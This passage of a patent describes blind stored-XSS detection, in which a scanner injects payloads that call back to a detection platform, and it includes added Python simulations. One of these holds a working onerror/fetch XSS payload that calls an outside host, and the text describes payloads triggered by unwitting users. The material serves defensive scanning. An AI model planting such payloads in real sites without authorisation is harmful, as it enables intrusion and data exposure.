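    resp = Response(body=f"<p>Posted</p>{payload}", headers={"Location": "/post/42"})
    pages = determine_trigger_pages(resp, payload, "http://forum.example/new")
    infos = simulate_webkit_trigger(pages[0], f"<html><body>{payload}</body></html>")
    print(pages, infos, verdict(got_response=True, alarm_received=bool(infos)))
```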
The following describes an exemplary vulnerability detection method on the vulnerability detection platform side.
As shown in fig. 3, an embodiment of the present application provides a vulnerability detection method, which is applied to a vulnerability detection platform, and includes the following steps:
S301, if first execution information of the attack program sent by the first terminal device through the vulnerability detection application is received, generating alarm information of the attack program;
the first execution information of the attack program is sent after the first terminal device triggers the attack program of the target vulnerability in the target application through the vulnerability detection application, and the attack program comprises access address information of the vulnerability detection platform.
S302, sending the alarm information of the attack program to the vulnerability detection application of the first terminal device, so that the vulnerability detection application can determine that the target vulnerability exists in the target application.
In some embodiments, the attack program includes identification information, and sending the alarm information of the attack program to the vulnerability detection application of the terminal device based on the first execution information of the attack program includes:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
The attack programs input to different positions of the target application have different identification information, and the input position of the attack program in the target application can be determined by verifying the identification information of the attack program, so that whether a target vulnerability exists in the corresponding input position of the target application is determined.
In some embodiments, the method further comprises the steps of:
if second execution information of the attack program sent by the second terminal device is received, generating alarm information of the attack program; and the second execution information of the attack program is sent after the second terminal equipment triggers the attack program in the target application.
Further, the trigger page address information of the attack program in the second execution information may be obtained, and the trigger page address information is sent to the vulnerability detection application of the first terminal device, so that the vulnerability detection application generates a detection report of the target vulnerability.
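The platform side of S301 and S302 with identification verification, as an added Python example that is not the patent's or NSFOCUS's code: the scanner is assumed to register the id and input position of each injected attack program with the platform beforehand; a callback carrying an unknown id is dropped, repeated callbacks for the same trigger page are deduplicated, and each verified callback becomes alarm information that maps back to the input position and records whether it came from the scanner (first terminal) or from another user (second terminal).

```python
import time
from dataclasses import dataclass
from typing import Optional


@dataclass
class Registration:
    """Where one attack program was input (recorded by the scanner at S201)."""
    app: str
    input_page: str
    position: str          # "content", "src-link" or "attribute": the three input modes
    issued_at: float


@dataclass
class Alarm:
    """Alarm information returned to the vulnerability detection application."""
    payload_id: str
    app: str
    input_page: str
    position: str
    trigger_page: str
    passive: bool          # True when triggered on a second terminal, not by the scanner


class BlindTypingPlatform:
    """Verify the identification information carried in execution information,
    deduplicate repeated callbacks, and turn a verified callback into an alarm."""

    def __init__(self) -> None:
        self._registry: dict = {}
        self._seen: set = set()
        self.alarms: list = []

    def register(self, payload_id: str, app: str, input_page: str, position: str) -> None:
        # Assumption: the scanner tells the platform which ids it issued and where
        # they were input, so that verification can map a callback to a position.
        self._registry[payload_id] = Registration(app, input_page, position, time.time())

    def handle_execution_info(self, info: dict, from_scanner: bool) -> Optional[Alarm]:
        """info is the access request the attack program makes when executed:
        {"payload_id": ..., "page": ...}. An id the platform never issued is
        dropped: it is noise, a stale probe, or a forged callback, not a finding."""
        payload_id = info.get("payload_id", "")
        page = info.get("page", "")
        reg = self._registry.get(payload_id)
        if reg is None:
            return None
        key = (payload_id, page)
        if key in self._seen:          # automatic deduplication of repeated triggers
            return None
        self._seen.add(key)
        alarm = Alarm(payload_id, reg.app, reg.input_page, reg.position, page,
                      passive=not from_scanner)
        self.alarms.append(alarm)
        return alarm

    def report(self, app: str) -> dict:
        """Detection report: every trigger page seen, grouped by input position."""
        out: dict = {}
        for a in self.alarms:
            if a.app == app:
                out.setdefault((a.input_page, a.position), []).append(a.trigger_page)
        return out
```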
The vulnerability detection method according to the embodiment of the present application is exemplarily described below with reference to fig. 4.
As shown in fig. 4, taking a target vulnerability to be detected as a storage-type XSS vulnerability and a target application as a Web application as an example, when detecting whether the Web application has the storage-type XSS vulnerability, the vulnerability detection process is as follows:
(1) Implant the payload in the Web application so that the payload is submitted to the server of the Web application.
In the first implantation manner, the vulnerability detection application may implant a payload, which is the attack program in the above embodiments of the present application, at a position where input is allowed, such as an input text box or a textarea text box of the Web application. The payload includes the address information of the blind typing platform, which may be understood as the vulnerability detection platform in the above embodiments; such a payload is highly covert, so the vulnerability detection rate may be improved.
In the second implantation manner, the vulnerability detection application can replace the src link at a position where the src attribute of a script tag of the Web application is controllable, and introduce the payload in this way.
In the third implantation manner, the vulnerability detection application can also detect the attribute positions in the HTML tags of the Web application, replace the execution content of an on-event or dynamically introduce an on-event, and load the payload through the on-event.
(2) After the payload is implanted, the scanning engine with a Webkit kernel of the vulnerability detection application analyzes the response content of the server of the Web application, captures content such as the URL (uniform resource locator) of the returned trigger page and the payload, and actively triggers the payload by virtually loading the trigger page through Webkit. This completes the first part: the blind typing process triggered by the Webkit crawler.
(3) Some payloads need to be triggered passively by other users because their position is hidden or the execution authority is insufficient. This process takes a certain period of time; the blind typing platform monitors continuously, and once it receives a request indicating that a blind typing payload was executed successfully, it immediately sends an alarm to notify the vulnerability detection application to generate a scan report. This completes the second part: the process triggered in the natural environment.
(4) The two blind typing techniques in (2) and (3) both rely on the blind typing platform. The platform monitors whether a blind typing payload was executed successfully and raises an alarm to notify the vulnerability scanning product; it also undertakes functions such as automatic deduplication of blind typing payloads and payload management. In certain scenarios it can also maintain the permissions of users of the vulnerability detection application persistently, avoiding the problem that a user cannot reproduce the finding after receiving the alarm.
In the embodiment of the application, a blind typing payload is submitted to the server of the Web application, a Webkit engine crawler actively crawls the relevant pages and triggers the payload to execute, and the logs on the blind typing platform are then analyzed to prove the existence of the stored XSS vulnerability.
By combining the blind typing technique with the Webkit virtual execution of the vulnerability detection application, that is, using the blind typing technique to implant script links (the address information of the blind typing platform) that Webkit can parse, the script links can both be virtually executed by the Webkit of the vulnerability detection application and be triggered by normal users. After scanning, the vulnerability detection application can detect the relatively direct stored XSS vulnerabilities by virtual execution, while payloads that must be triggered by a user with a certain authority or that are hidden in position are supplemented by being triggered by other users. Ordinary users thus become a subject of vulnerability detection, giving full play to the advantages of the blind typing technique. In the embodiment of the application, the subjects executing the blind typing payload are both the vulnerability detection application and ordinary users; expanding the set of subjects that execute the blind typing payload improves the vulnerability detection effect and solves the problem of the low detection rate of stored XSS.
Based on the same inventive concept as the above method embodiment of the present application, the embodiment of the present application further provides a vulnerability detection apparatus, and the principle of the apparatus for solving the problem is similar to the method of the above embodiment, so the implementation of the apparatus can refer to the implementation of the above method, and repeated details are not repeated.
As shown in fig. 5, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a first terminal device, where the vulnerability detection apparatus 50 includes:
the input module 51 is used for inputting the attack program of the target vulnerability into the target application through the vulnerability detection application and sending the attack program to the corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
the determining module 52 is configured to, if the response content returned by the server is obtained through the vulnerability detection application, analyze the response content, and determine a trigger page of the attack program in the target application;
the trigger module 53 is configured to crawl a trigger page and execute an attack program through a vulnerability detection application, so as to send first execution information of the attack program to a vulnerability detection platform;
and the detection module 54 is configured to receive alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determine that the target vulnerability exists in the target application according to the alarm information.
In an alternative embodiment, the input module is further configured to:
inputting the attack program of the target vulnerability into the content input position of the target page of the target application through the vulnerability detection application; or
Inputting an attack program of a target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
And inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an alternative embodiment, the determining module is further configured to:
analyzing the response content, and determining a trigger page of the attack program according to the analyzed page address information; or
And analyzing the response content, and determining the input page of the attack program as a trigger page according to the analyzed attack program.
In an optional embodiment, the apparatus further comprises a vulnerability determining module, configured to:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by the second terminal device.
In an optional embodiment, the apparatus further comprises a non-vulnerability determination module, configured to:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
Based on the same inventive concept as the above method embodiment of the present application, the embodiment of the present application further provides a vulnerability detection apparatus, and the principle of the apparatus for solving the problem is similar to the method of the above embodiment, so the implementation of the apparatus can refer to the implementation of the above method, and repeated details are not repeated.
As shown in fig. 6, the vulnerability detection apparatus 60 provided in the embodiment of the present application is applied to a vulnerability detection platform, and includes a first receiving module 61 and an alarm sending module 62.
The first receiving module 61 is configured to generate alarm information of an attack program if first execution information of the attack program sent by the first terminal device through the vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and an alarm sending module 62, configured to send alarm information to the vulnerability detection application of the first terminal device, so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the attack program includes identification information, and the alarm sending module is further configured to:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
In an optional embodiment, the apparatus further comprises a second receiving module, configured to:
if second execution information of the attack program sent by the second terminal device is received, generating alarm information of the attack program; and the second execution information of the attack program is sent after the second terminal equipment triggers the attack program in the target application.
Further, the alarm sending module 62 may further obtain the address information of the trigger page of the attack program in the second execution information, and send the address information of the trigger page to the vulnerability detection application of the first terminal device.
After introducing a vulnerability detection method and apparatus of an exemplary embodiment of the present application, an electronic device according to another exemplary embodiment of the present application is introduced next.
An embodiment of the present application provides an electronic device 700, shown in fig. 7, including: memory 720 and processor 710:
the memory 720 is used to store computer programs that may be run on the processor;
the processor 710 is configured to execute a computer program to implement any of the vulnerability detection methods in the above embodiments.
In some possible implementations, an electronic device according to the present application may include at least one processor and at least one memory. The memory stores program code which, when executed by the processor, causes the processor to perform the steps of the vulnerability detection method according to the various exemplary embodiments of the present application described above in this specification. For example, the processor may perform the steps shown in fig. 2 or fig. 3.
In an exemplary embodiment, a storage medium comprising instructions, such as a memory comprising instructions, executable by the processor 710 to perform the vulnerability detection methods described above is also provided. Alternatively, the storage medium may be a non-transitory computer readable storage medium, for example, the non-transitory computer readable storage medium may be a ROM, a Random Access Memory (RAM), a CD-ROM, a magnetic tape, a floppy disk, an optical data storage device, and the like.
In an exemplary embodiment, the electronic device may also be an electronic device having a communication function, and therefore, the electronic device may include other components in addition to the processor and the memory described above. As shown in connection with fig. 8, may include: radio Frequency (RF) circuitry 810, Wireless Fidelity (Wi-Fi) module 820, communication interface 830, display unit 840, power supply 850, processor 860, memory 870, and the like. Those skilled in the art will appreciate that the configuration of the electronic device shown in fig. 8 does not constitute a limitation of the electronic device, and the electronic device provided by the embodiments of the present application may include more or less components than those shown, or may combine some components, or may be arranged in different components.
The following describes each component of the electronic device 800 in detail with reference to fig. 8:
the electronic device 800 may obtain alarm information generated by the security device within a preset time period through the RF circuit 810, the Wi-Fi module 820, and the communication module of the communication interface 830.
The RF circuitry 810 may be used for receiving and transmitting data during communication. In particular, the RF circuit 810 sends downlink data of the base station to the processor 860 for processing; and in addition, sending the uplink data to be sent to the base station. Generally, the RF circuit 810 includes, but is not limited to, an antenna, at least one Amplifier, a transceiver, a coupler, a Low Noise Amplifier (LNA), a duplexer, and the like.
In addition, the RF circuitry 810 may also communicate with networks and other electronic devices via wireless communications. The wireless communication may use any communication standard or protocol, including but not limited to Global System for Mobile communication (GSM), General Packet Radio Service (GPRS), Code Division multiple Access (Code Division multiple Access, CDMA), Wideband Code Division Multiple Access (WCDMA), Long Term Evolution (LTE), email, Short Message Service (SMS), and the like.
The Wi-Fi technology belongs to a short-distance wireless transmission technology, and the electronic device 800 may connect to an Access Point (AP) through the Wi-Fi module 820, thereby implementing Access to a data network. The Wi-Fi module 820 may be used for receiving and transmitting data during communication.
The electronic device 800 may be physically connected to other electronic devices via the communication interface 830. Optionally, the communication interface 830 is connected to the communication interface of the other electronic device through a cable, so as to implement data transmission between the electronic device 800 and the other electronic device.
In this embodiment of the application, the electronic device 800 is capable of implementing a communication service to send information to other contacts, so that the electronic device 800 needs to have a data transmission function, that is, the electronic device 800 needs to include a communication module inside. Although fig. 8 shows communication modules such as the RF circuit 810, the Wi-Fi module 820, and the communication interface 830, it is understood that at least one of the above components or other communication modules (e.g., bluetooth module) for enabling communication may be present in the electronic device 800 for data transmission.
For example, when the electronic device 800 is a computer, the electronic device 800 may include the communication interface 830 and may further include the Wi-Fi module 820; when the electronic device 800 is a tablet computer, the electronic device 800 may include the Wi-Fi module.
The display unit 840 may be used to display a page of a target application. The display unit 840 is a display system of the electronic device 800, and is configured to present an interface and implement human-computer interaction.
The display unit 840 may include a display panel 841. Alternatively, the Display panel 841 may be configured in the form of a Liquid Crystal Display (LCD), an Organic Light-Emitting Diode (OLED), or the like.
The memory 870 may be used to store software programs and modules. The processor 860 performs the various functional applications and data processing of the electronic device 800 by executing the software programs and modules stored in the memory 870. The memory 870 may include high speed random access memory and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other non-volatile solid state storage device.
The processor 860 is the control center of the electronic device 800; it connects the various components using various interfaces and lines, and performs the functions of the electronic device 800 and processes its data by running or executing the software programs and/or modules stored in the memory 870 and calling the data stored in the memory 870, thereby implementing the various services based on the electronic device. The processor 860 here is the processor 860 shown in fig. 8. Optionally, the processor 860 may include one or more processing units. Optionally, the processor 860 may integrate an application processor and a modem processor, where the application processor mainly handles the operating system, user interface, application programs and the like, and the modem processor mainly handles wireless communication. It will be appreciated that the modem processor need not be integrated into the processor 860.
The electronic device 800 also includes a power supply 850 (e.g., a battery) for powering the various components. Optionally, the power supply 850 may be logically connected to the processor 860 through a power management system, so as to implement functions of managing charging, discharging, and power consumption through the power management system.
In some possible embodiments, various aspects of the vulnerability detection method provided by the present application may also be implemented in the form of a program product, which includes program code that, when the program product is run on a computer device, causes the computer device to execute the steps of the vulnerability detection method according to the various exemplary embodiments of the present application described above in this specification; for example, the program code may cause the computer device to execute steps 201 to 204 shown in fig. 2.
The program product may employ any combination of one or more readable media. The readable medium may be a readable signal medium or a readable storage medium. A readable storage medium may be, for example, but is not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or any combination of the foregoing. More specific examples (a non-exhaustive list) of the readable storage medium include: an electrical connection having one or more wires, a portable diskette, a hard disk, a random access memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), an optical fiber, a portable compact disc read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing.
It should be noted that although several modules of the apparatus are mentioned in the above detailed description, such division is merely exemplary and not mandatory. Indeed, the features and functionality of two or more of the modules described above may be embodied in one module according to embodiments of the application. Conversely, the features and functions of one module described above may be further divided so as to be embodied by a plurality of modules.
Further, while the operations of the methods of the present application are depicted in the drawings in a particular order, this does not require or imply that these operations must be performed in this particular order, or that all of the illustrated operations must be performed, to achieve desirable results. Additionally or alternatively, certain steps may be omitted, multiple steps combined into one step execution, and/or one step broken down into multiple step executions.
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to the application. It will be understood that each flow and/or block of the flow diagrams and/or block diagrams, and combinations of flows and/or blocks in the flow diagrams and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be apparent to those skilled in the art that various changes and modifications may be made in the present application without departing from the spirit and scope of the application. Thus, if such modifications and variations of the present application fall within the scope of the claims of the present application and their equivalents, the present application is intended to include such modifications and variations as well.

Claims (12)

1. A vulnerability detection method is applied to a first terminal device and comprises the following steps:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application;
crawling the trigger page and executing the attack program through the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform;
and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
2. The method of claim 1, wherein the inputting of the attack program of the target vulnerability into the target application through the vulnerability detection application comprises:
inputting the attack program of the target vulnerability into a content input position of a target page of the target application through the vulnerability detection application; or
inputting the attack program of the target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
inputting the attack program of the target vulnerability into a specified attribute position in a page tag corresponding to a target page of the target application through the vulnerability detection application.
3. The method according to claim 1 or 2, wherein the parsing of the response content and the determining of the trigger page of the attack program in the target application comprises:
analyzing the response content, and determining a trigger page of the attack program in the target application according to the analyzed page address information; or
And analyzing the response content, and determining an input page of the attack program in the target application as the trigger page according to the analyzed attack program.
4. The method according to claim 1 or 2, characterized in that the method further comprises:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by second terminal equipment.
5. The method according to claim 1 or 2, characterized in that the method further comprises:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
6. A vulnerability detection method is applied to a vulnerability detection platform and comprises the following steps:
if first execution information of an attack program sent by a first terminal device through a vulnerability detection application is received, generating alarm information of the attack program; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in a target application through the vulnerability detection application, wherein the attack program comprises access address information of the vulnerability detection platform;
and sending the alarm information of the attack program to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
7. The method according to claim 6, wherein the attack program includes identification information, and the sending of the alarm information of the attack program to the vulnerability detection application of the first terminal device based on the first execution information of the attack program comprises:
acquiring the identification information of the attack program from the first execution information of the attack program;
and after the identification information is verified, sending the alarm information of the attack program to the vulnerability detection application of the first terminal device.
8. The method of claim 6, further comprising:
if second execution information of the attack program sent by a second terminal device is received, generating alarm information of the attack program; the second execution information of the attack program is sent after the second terminal device triggers the attack program in the target application.
9. A vulnerability detection apparatus, applied to a first terminal device, comprising:
an input module, configured to input an attack program of a target vulnerability into a target application through a vulnerability detection application and send the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
a determining module, configured to, if response content returned by the server is obtained through the vulnerability detection application, parse the response content and determine a trigger page of the attack program in the target application;
a trigger module, configured to crawl the trigger page and execute the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform;
and a detection module, configured to receive alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application and determine, according to the alarm information, that the target vulnerability exists in the target application.
10. A vulnerability detection apparatus, applied to a vulnerability detection platform, comprising:
a first receiving module, configured to generate alarm information of an attack program if first execution information of the attack program sent by a first terminal device through a vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in a target application through the vulnerability detection application, wherein the attack program comprises access address information of the vulnerability detection platform;
and an alarm sending module, configured to send the alarm information to the vulnerability detection application of the first terminal device so that the vulnerability detection application determines that the target vulnerability exists in the target application.
11. An electronic device comprising a memory and a processor, the memory having stored thereon a computer program operable on the processor, the computer program, when executed by the processor, causing the processor to carry out the method of any one of claims 1 to 5 or 6 to 8.
12. A computer-readable storage medium having a computer program stored therein, wherein the computer program, when executed by a processor, implements the method of any one of claims 1 to 5 or 6 to 8.
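The detection loop that claims 1 to 8 describe is an out-of-band probe: the attack program carries the platform's callback address and an identifier, and the verdict comes from whether the platform receives execution information, not from what the target's own response says. The following Python simulation is an added example, not code from the patent or from its assignee. The callback host `platform.example`, the `Guestbook` target with a deliberately unescaped comment field, the in-process `browser_execute` stand-in for a headless browser, and the HMAC-tagged identifier used to verify callbacks in the spirit of claim 7 are all assumptions introduced for illustration so that the example runs offline.

```python
import hashlib
import hmac
import html
import re
import secrets
from urllib.parse import parse_qs, urlparse

PLATFORM_HOST = "https://platform.example"  # hypothetical callback host


class DetectionPlatform:
    """Vulnerability detection platform: issues attack programs, verifies the
    identification information carried back by callbacks, and records alarms."""

    def __init__(self, key: bytes):
        self._key = key      # platform-side secret used to tag probe ids
        self.alarms = {}     # probe_id -> list of execution records

    def _tag(self, probe_id: str) -> str:
        return hmac.new(self._key, probe_id.encode(), hashlib.sha256).hexdigest()[:16]

    def issue_probe(self):
        """Return (probe_id, attack program). The program embeds the platform's
        access address plus the identification information (id and keyed tag)."""
        probe_id = secrets.token_hex(8)
        url = f"{PLATFORM_HOST}/cb?id={probe_id}&t={self._tag(probe_id)}"
        return probe_id, f"<img src=x onerror=\"fetch('{url}')\">"

    def receive_execution_info(self, callback_url: str, source: str) -> bool:
        """Execution information from whichever terminal rendered the page.
        A callback whose tag does not verify is dropped instead of raising an alarm,
        so a third party who guesses the URL format cannot forge findings."""
        q = parse_qs(urlparse(callback_url).query)
        probe_id = q.get("id", [""])[0]
        tag = q.get("t", [""])[0]
        if not probe_id or not hmac.compare_digest(tag, self._tag(probe_id)):
            return False
        self.alarms.setdefault(probe_id, []).append({"source": source})
        return True

    def alarm_for(self, probe_id: str) -> list:
        return self.alarms.get(probe_id, [])


class Guestbook:
    """Toy target application (constructed for this example). escape=False leaves a
    stored-XSS flaw; links_back=False models a form whose response gives the
    scanner no page address to crawl (the blind case of claims 4 and 5)."""

    def __init__(self, escape: bool, links_back: bool = True):
        self.escape = escape
        self.links_back = links_back
        self.posts = []

    def submit(self, text: str) -> str:
        self.posts.append(text)
        if not self.links_back:
            return "<p>Thanks!</p>"
        return f'<p>Thanks!</p><a href="/guestbook?page={len(self.posts)}">view</a>'

    def render(self, path: str) -> str:
        items = "".join(f"<li>{html.escape(p) if self.escape else p}</li>" for p in self.posts)
        return f"<html><body><ul>{items}</ul></body></html>"


def browser_execute(page_html: str, platform: DetectionPlatform, source: str) -> int:
    """Stand-in for a headless browser: every live onerror=fetch(...) handler fires.
    An escaped payload is rendered as text, not as a tag, so the pattern skips it."""
    hits = 0
    for url in re.findall(r"<img[^>]*onerror=\"fetch\('([^']+)'\)\"", page_html):
        if platform.receive_execution_info(url, source):
            hits += 1
    return hits


def find_trigger_page(response: str):
    """Claim 3, page-address variant: the trigger page is the one the response links to."""
    m = re.search(r'href="([^"]+)"', response)
    return m.group(1) if m else None


def detect_stored_xss(app: Guestbook, platform: DetectionPlatform):
    """First-terminal procedure of claims 1, 4 and 5. Returns (probe_id, verdict)."""
    probe_id, attack_program = platform.issue_probe()
    response = app.submit(attack_program)          # inject and send to the server
    trigger_page = find_trigger_page(response)
    if trigger_page is not None:                   # crawl it and execute the program
        browser_execute(app.render(trigger_page), platform, source="first-terminal")
    verdict = "vulnerable" if platform.alarm_for(probe_id) else "not-vulnerable"
    return probe_id, verdict


if __name__ == "__main__":
    platform = DetectionPlatform(b"platform-secret")
    print(detect_stored_xss(Guestbook(escape=False), platform))   # ('...', 'vulnerable')
    print(detect_stored_xss(Guestbook(escape=True), platform))    # ('...', 'not-vulnerable')
```

Two points the claims leave implicit are worth noting when building this for real. First, the verdict for a target that returns no usable response is only "not triggered yet": the same probe can still fire later when another terminal (an administrator's browser, in the second-terminal case of claim 4) renders the stored payload, so the platform must keep probe identifiers alive and the scanner must re-query them rather than treating one pass as final. Second, the identification information verified under claim 7 should be unforgeable, not just unique; a keyed tag as above means a callback hitting the platform is evidence that a page the platform itself seeded actually executed, rather than something anyone who saw the URL format could replay.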

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202111576762.2A CN114357457A (en) 2021-12-22 2021-12-22 Vulnerability detection method and device, electronic equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202111576762.2A CN114357457A (en) 2021-12-22 2021-12-22 Vulnerability detection method and device, electronic equipment and storage medium

Publications (1)

Publication Number Publication Date
CN114357457A true CN114357457A (en) 2022-04-15

Family

ID=81101416

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202111576762.2A Pending CN114357457A (en) 2021-12-22 2021-12-22 Vulnerability detection method and device, electronic equipment and storage medium

Country Status (1)

Country Link
CN (1) CN114357457A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114884722A * 2022-05-05 2022-08-09 五八有限公司 Vulnerability detection method and device, electronic equipment and readable storage medium
CN114760151A * 2022-06-13 2022-07-15 宁波和利时信息安全研究院有限公司 Method and device for acquiring authority of upper computer through PLC
CN114760151B * 2022-06-13 2022-09-13 宁波和利时信息安全研究院有限公司 Method and device for acquiring authority of upper computer through PLC

Similar Documents

Publication Publication Date Title
US9954855B2 (en) Login method and apparatus, and open platform system
CN104767775B (en) Web application information push method and system
US8819819B1 (en) Method and system for automatically obtaining webpage content in the presence of javascript
EP2447878B1 (en) Web based remote malware detection
US20140173736A1 (en) Method and system for detecting webpage Trojan embedded
CN108881101B (en) Cross-site script vulnerability defense method and device based on document object model and client
CN109347882B (en) Webpage Trojan horse monitoring method, device, equipment and storage medium
US20150271202A1 (en) Method, device, and system for detecting link layer hijacking, user equipment, and analyzing server
CN106339309B (en) Application program testing method, client and system
US8448260B1 (en) Electronic clipboard protection
WO2019184053A1 (en) Method and terminal for browsing page of application
CN102739663A (en) Detection method and scanning engine of web pages
US20140304839A1 (en) Electronic clipboard protection
CN114357457A (en) Vulnerability detection method and device, electronic equipment and storage medium
CN107862091B (en) Control method and device for realizing webpage access
US10972507B2 (en) Content policy based notification of application users about malicious browser plugins
EP3926918A1 (en) Network attack defense method and apparatus, device, system and storage medium
CN105791261A (en) Detection method and detection device for cross-site scripting attack
US8789177B1 (en) Method and system for automatically obtaining web page content in the presence of redirects
CN104079611A (en) Method for preventing cross-site request forgery, related device and system
CN112231711A (en) Vulnerability detection method and device, computer equipment and storage medium
US10474810B2 (en) Controlling access to web resources
CN104486292A (en) Enterprise-resource safety-access control method, device and system
US8650214B1 (en) Dynamic frame buster injection
US11128639B2 (en) Dynamic injection or modification of headers to provide intelligence

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination